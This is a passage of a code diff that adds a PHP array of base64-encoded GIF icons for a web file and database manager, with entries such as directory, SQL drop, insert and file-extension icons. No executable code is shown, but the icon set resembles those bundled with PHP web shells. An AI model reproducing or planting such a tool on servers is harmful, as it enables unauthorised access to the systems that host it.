+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", 
+"search"=> 
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". 
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". 
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". 
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". 
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", 
+"setup"=> 
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". 
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". 
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". 
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". 
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", 
+"small_dir"=> 
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". 
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", 
+"small_unk"=> 
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". 
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". 
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". 
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". 
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". 
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". 
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". 
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". 
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". 
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". 
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". 
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". 
+"yAsokBkQADs=", 
+"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". 
+"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", 
+"sort_asc"=> 
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". 
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", 
+"sort_desc"=> 
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". 
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", 
+"sql_button_drop"=> 
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". 
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". 
+"AQEAOw==", 
+"sql_button_empty"=> 
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". 
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", 
+"sql_button_insert"=> 
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". 
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", 
+"up"=> 
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". 
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". 
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", 
+"write"=> 
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". 
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". 
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", 
+"ext_asp"=> 
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". 
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". 
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", 
+"ext_mp3"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". 
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". 
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", 
+"ext_avi"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". 
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". 
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7", 
+"ext_cgi"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". 
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". 
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". 
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". 
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". 
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". 
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". 
+"RYtMAgEAOw==", 
+"ext_cmd"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". 
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". 
+"dmrYAMn1onq/YKpjvEgAADs=", 
+"ext_cpp"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". 
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". 
+"Eq7YrLDE7a4SADs=", 
+"ext_ini"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". 
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". 
+"SnEjgPVarHEHgrB43JvszsQEADs=", 
+"ext_diz"=> 
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". 
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". 
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". 
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". 
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". 
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". 
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". 
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". 
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". 
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". 
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". 
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". 
+"Ow==", 
+"ext_doc"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". 
+"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". 
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", 
+"ext_exe"=> 
+"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". 
+"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". 
+"xhIAOw==", 
+"ext_h"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". 
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". 
+"Wq/NknbbSgAAOw==", 
+"ext_hpp"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". 
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". 
+"UqUagnbLdZa+YFcCADs=", 
+"ext_htaccess"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". 
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". 
+"AAA7", 
+"ext_html"=> 
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". 
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". 
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". 
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". 
+"ADs=", 
+"ext_jpg"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". 
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". 
+"FxEAOw==", 
+"ext_js"=> 
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". 
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". 
+"a00AjYYBbc/o9HjNniUAADs=", 
+"ext_lnk"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". 
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". 
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". 
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". 
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". 
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". 
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". 
+"ADs=", 
+"ext_log"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". 
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", 
+"ext_php"=> 
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". 
+"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", 
+"ext_pl"=> 
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". 
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", 
+"ext_swf"=> 
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". 
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". 
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". 
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". 
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", 
+"ext_tar"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". 
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". 
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". 
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". 
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". 
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". 
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". 
+"u4tLAgEAOw==", 
+"ext_txt"=> 
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". 
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". 
+"UpPWG3Ig6Hq/XmRjuZwkAAA7", 
+"ext_wri"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". 
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", 
+"ext_xml"=> 
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". 
